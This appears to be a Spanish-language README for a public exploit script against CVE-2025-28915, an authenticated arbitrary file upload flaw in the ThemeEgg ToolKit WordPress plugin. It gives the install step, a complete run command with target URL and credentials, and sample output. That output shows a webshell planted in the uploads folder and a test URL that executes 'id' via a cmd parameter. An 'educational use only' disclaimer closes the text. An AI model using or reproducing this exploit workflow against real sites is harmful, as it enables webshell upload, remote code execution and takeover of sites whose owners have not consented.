
Plugin ThemeEgg ToolKit de WordPress <= 1.2.9 - Vulnerabilidad de carga arbitraria de archivos
Una vulnerabilidad de Subida de Archivos Sin Restricciones en el plugin ThemeEgg ToolKit para WordPress (versiones ≤ 1.2.9) permite a atacantes autenticados subir webshells al servidor. Esto puede conducir a la ejecución remota de código (RCE), la toma completa del sitio web y el compromiso de datos sensibles.
Este script automatiza la explotación de CVE-2025-28915 mediante:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Argumento | Descripción |
|---|---|
-u | URL objetivo de WordPress (ej., http://target.com/wordpress) |
-un | Nombre de usuario de WordPress |
-p | Contraseña de WordPress |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Este script es solo para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso.
Por: Khaled Alenazi (Nxploit)